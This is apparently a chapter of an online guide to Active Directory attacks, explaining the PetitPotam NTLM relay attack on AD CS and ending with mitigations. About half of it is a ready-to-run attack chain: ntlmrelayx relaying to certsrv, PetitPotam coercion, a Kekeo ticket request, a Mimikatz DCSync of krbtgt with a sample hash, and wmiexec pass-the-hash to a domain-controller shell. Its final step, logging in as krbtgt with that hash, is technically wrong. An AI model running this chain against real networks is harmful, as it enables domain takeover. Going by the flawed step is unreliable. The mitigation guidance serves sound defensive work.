Attack Technique 8: PetitPotam NTLM Relay Attack on a Active Directory Certificate Services (AD CS)

PetitPotam NTLM Relay Attack: Overview, Execution, and Mitigation Strategies

Introduction

The PetitPotam NTLM Relay Attack exploits vulnerabilities in legacy protocols, particularly Windows NTLM authentication and the MS-EFSRPC protocol. Attackers use this method to compromise Active Directory (AD) environments, specifically targeting Active Directory Certificate Services (AD-CS) configurations that lack proper security measures.

Attack Overview

  1. Exploitation of MS-EFSRPC Protocol:

    • Attackers use PetitPotam to force a Domain Controller (DC) to authenticate via NTLM to a malicious server.

  2. NTLM Relay to AD-CS:

    • The attacker relays the captured NTLM authentication to an AD-CS Web Enrollment page to request a domain controller certificate.

  3. Certificate-Based Privilege Escalation:

    • Using the certificate, attackers obtain a Ticket Granting Ticket (TGT) for the domain controller account.

  4. Domain Compromise:

    • The TGT allows high-privilege operations, leading to full domain compromise.

Impact

  • Full Domain Compromise: Attackers gain control over sensitive domain accounts and data.

  • Privilege Escalation: Domain Controller certificates enable unauthorized high-privilege actions.

  • Persistent Threat: Certificates can be reused to maintain access.

Techniques to Perform a PetitPotam NTLM Relay Attack

Step 1: Setting Up NTLM Relay to AD-CS

Use Impacket's ntlmrelayx.py to intercept and relay NTLM authentication requests to the AD-CS Web Enrollment page.

Command:

sudo python3 ntlmrelayx.py -debug -smb2support --target http://<target-ip>/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

Flags:

  • --target: Specifies the AD-CS enrollment URL.

  • --adcs: Indicates targeting an AD-CS server.

  • --template: Specifies the KerberosAuthentication template.

  • -smb2support: Enables SMBv2 connections.

Step 2: Exploiting PetitPotam Vulnerability

Trigger NTLM authentication from the Domain Controller using PetitPotam.

Command:

python3 Petitpotam.py <listener-ip> <target-ip>

  • listener-ip: Attacker's relay server.

  • target-ip: Target Domain Controller.

Result: Captured NTLM authentication forwarded to AD-CS.

Step 3: Obtaining a Ticket Granting Ticket (TGT)

With the certificate obtained, use Kekeo or Rubeus to request a TGT.

Kekeo Command:

Kekeo # tgt::ask /pfx:<base64 cert> /user:DC-101$ /domain:EXAMPLE.local /ptt

  • DC-101$: Domain Controller account.

  • ptt: Pass-the-ticket functionality.

Step 4: Performing DCSync Attack

Extract the krbtgt hash using Mimikatz.

Mimikatz Command:

lsadump::dcsync /domain:EXAMPLE.local /user:krbtgt

Result:

Hash of krbtgt: 186c026974e59a14040dbc63aa8fb8c4

Step 5: Pass-the-Hash

Use the krbtgt hash to gain access to the Domain Controller.

Impacket Command:

wmiexec.py -hashes :186c026974e59a14040dbc63aa8fb8c4 EXAMPLE/krbtgt@<target-ip>

Outcome: Interactive shell on the Domain Controller with elevated privileges.

Mitigation Techniques for PetitPotam NTLM Relay Attacks

1. Enable Extended Protection for Authentication (EPA)

EPA enforces mutual authentication and prevents NTLM relay attacks.

Steps:

  • Open IIS Manager.

  • Set Extended Protection for Authentication to Required.

  • Update the Web.config file of the Certificate Enrollment Web Service:

    Example:

    <extendedProtectionPolicy policyEnforcement="Always" />

2. Enforce SSL-Only Connections

Ensure all connections to the AD-CS Web Enrollment page use SSL.

Steps:

  • In IIS Manager, enable Require SSL for the Web Enrollment site.

Command:

iisreset /restart

3. Disable NTLM Authentication Where Possible

Transition to Kerberos Authentication for services and protocols.

Steps:

  • Use Group Policy to disable NTLM:

    • Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity Options.

    • Configure Network Security: Restrict NTLM policies.

4. Harden AD-CS Configurations

Restrict certificate issuance by tightening AD-CS configurations.

  • Use specific templates that enforce stricter authentication.

  • Disable the KerberosAuthentication template if not required.

5. Monitor MS-EFSRPC Protocol Usage

Regularly audit usage of the EFSRPC protocol to detect unauthorized NTLM authentication triggers.

Conclusion

The PetitPotam NTLM Relay Attack targets legacy authentication mechanisms and misconfigured AD-CS environments, enabling attackers to achieve full domain compromise.

To mitigate this risk:

  • Enforce EPA and SSL to protect AD-CS.

  • Disable NTLM and adopt Kerberos.

  • Regularly monitor and audit protocol usage and certificate services.

By implementing these measures, organizations can effectively reduce the attack surface and protect their Active Directory environments from this sophisticated threat.

PreviousAttack Technique 7: LDAP Injection AttackNextConclusion & References

Last updated